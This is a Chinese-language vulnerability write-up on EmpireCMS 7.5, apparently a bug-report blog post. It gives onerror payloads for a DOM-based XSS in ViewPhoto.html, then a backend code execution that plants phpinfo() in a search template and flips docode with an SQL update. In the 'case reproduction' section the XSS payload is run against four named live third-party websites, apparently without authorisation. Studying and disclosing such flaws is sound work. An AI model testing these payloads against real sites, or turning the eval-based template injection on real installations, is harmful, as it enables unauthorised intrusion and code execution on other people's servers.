DOM型xss
漏洞分析
漏洞地址
/e/data/mfile/ViewPhoto.html
Request函数获取URL参数输入,通过window.location获取当前地址,根据传入的url参数,获取当前地址url参数起始位置和结束位置。
data:image/s3,"s3://crabby-images/767b2/767b2f01fdd98eab67ddeae218868ec771c57e7e" alt="2WiRqP.png"
通过Request函数获取URL参数,并作为img的src属性和input的value属性,然后通过document.write输出到页面。
data:image/s3,"s3://crabby-images/a3d2d/a3d2dcb7b066d6c312a73033518547002a280900" alt="2Wiha8.png"
payload
1 2
| /e/data/mfile/viewphoto.html?url=" onerror=alert(1);> /e/data/mfile/viewphoto.html?url=1" onerror=alert(1) asd="
|
本地复现
本地测试成功,前提是必须用IE浏览器打开,原因是ViewPhoto.html没有对输入的数据进行url解码,而只有IE浏览器才会把payload进行url解码后输出在html中,其他浏览器会原封不动的输出url编码后的payload,造成利用失败。
data:image/s3,"s3://crabby-images/30348/30348cf3038de9f318e0aa9e92cd731a2f75d3ab" alt="2Wi2rt.png"
案例复现
用ie浏览器打开
1 2 3 4
| http://cfdacx.com/e/data/mfile/ViewPhoto.html?url=1" onerror=alert(1) asd=" http://121.41.73.134/shshufa/e/data/mfile/ViewPhoto.html?url=1" onerror=alert(1) asd=" http://www.zkhsz.com/m/e/data/mfile/ViewPhoto.html?url=1" onerror=alert(1) asd=" http://mdhrczi.52xuzhi.com/e/data/mfile/ViewPhoto.html?url=1" onerror=alert(1) asd="
|
data:image/s3,"s3://crabby-images/5e44c/5e44c83e633d17a1f78c3af5025f036f03185fd6" alt="2WigKI.png"
data:image/s3,"s3://crabby-images/4be8e/4be8eab4d4011e8523b4c8f8546505d383f1491f" alt="2Wiy2d.png"
data:image/s3,"s3://crabby-images/a5321/a532174394d6da1f927a9f5c334cbe519673a81c" alt="2WifVf.png"
后台代码执行
初始化配置
下载Empirecms7.5
http://www.phome.net/download/
需要先添加终极栏目
data:image/s3,"s3://crabby-images/f514f/f514f6f3158126b0f225815e3ad90f51d59c58bf" alt="2Wiqrq.png"
修改模板选项
data:image/s3,"s3://crabby-images/db157/db1573dff918347571e9365831d0d49474bc6f34" alt="2WiXZV.png"
在增加新闻处增加一篇文章,内容按下面的格式即可
data:image/s3,"s3://crabby-images/92492/9249255b1718a886f414c3230b516682b471c709" alt="2WivIU.png"
漏洞分析
e/class/connect.php
ReplaceListVars方法存在eval,参数$listtemp可控,当满足条件$decode==1时触发代码执行
data:image/s3,"s3://crabby-images/61422/61422bfd93521bc3031582f528fdd598d6f6fe0a" alt="2WiIPg.png"
/e/search/result/index.php
参数来源于第二个参数$listvar
data:image/s3,"s3://crabby-images/de8ce/de8ceeba14239ec5d289ea76e7b0c8ccdfaaefac" alt="2WiT2j.png"
/e/search/result/index.php
$listvar来源于$tempr[listvar]
data:image/s3,"s3://crabby-images/524ac/524ac7145231c143666bfa9bcf7daf556c7e5d42" alt="2Wi7xs.png"
/e/search/result/index.php
$listvar和$docode都来自于phome_enewssearchtemp表
1 2 3 4
| if($search_r['tempid']) { $tempr=$empire->fetch1("select temptext,subnews,listvar,rownum,showdate,modid,subtitle,docode from ".GetTemptb("enewssearchtemp")." where tempid='".$search_r['tempid']."' limit 1"); }
|
可以看到这两个字段
data:image/s3,"s3://crabby-images/55524/555244f10dc59d04ef2debddefe02844c096322f" alt="2WibMn.png"
登陆后台,进入后台地图->管理搜索模板,在搜索模板插入恶意代码
data:image/s3,"s3://crabby-images/1445d/1445d3770c22b80f5a79746c23cd0880cb074033" alt="2WiLq0.png"
其中可以修改listvar字段的值,在其中加入php代码
1 2 3 4 5 6 7 8 9 10 11 12 13 14
| phpinfo();/*<h2 class="r"><span>[!--no.num--].</span> <a class="l" href="[!--titleurl--]" target="_blank">[!--title--]</a></h2> <table width="80%" border="0" cellpadding="0" cellspacing="0"> <tbody> <tr> <td>[!--smalltext--]</td> </tr> <tr> <td><span class="a">[!--titleurl--] - [!--newstime--]</span> - <a class="fl" href="[!--this.classlink--]" target="_blank">[!--this.classname--]</a></td> </tr> <tr> <td> </td> </tr> </tbody> </table>*/
|
data:image/s3,"s3://crabby-images/7b321/7b3218d1ffa87b45890a63edfe741a8f5421c2a6" alt="2WioGQ.png"
由于docode字段默认值为0,需要利用后台的sql执行功能把它改成1
1
| update phome_enewssearchtemp set docode=1 where tempid=1;
|
data:image/s3,"s3://crabby-images/f1250/f125086d6f75c5e9faebd4d04d2323dadf802338" alt="2Wi4IS.png"
站内搜索添加好的文章,这里必须保证相应标题的内容是存在的,才会触发漏洞
data:image/s3,"s3://crabby-images/68775/68775df2ac392c65e1d2268d36efe6230ee6a4e3" alt="2WiziF.png"
成功执行
1
| http://localhost/e/search/result/?searchid=1
|
data:image/s3,"s3://crabby-images/5823e/5823ea6f4c33263671885093f4b21bff0b3d9930" alt="2WijaT.png"
总结
第一个xss没通过审核,代码执行过了
证书
data:image/s3,"s3://crabby-images/09d14/09d1406e8f6cbfeda39b8c57330ae43a001d76f3" alt="2WFSG4.png"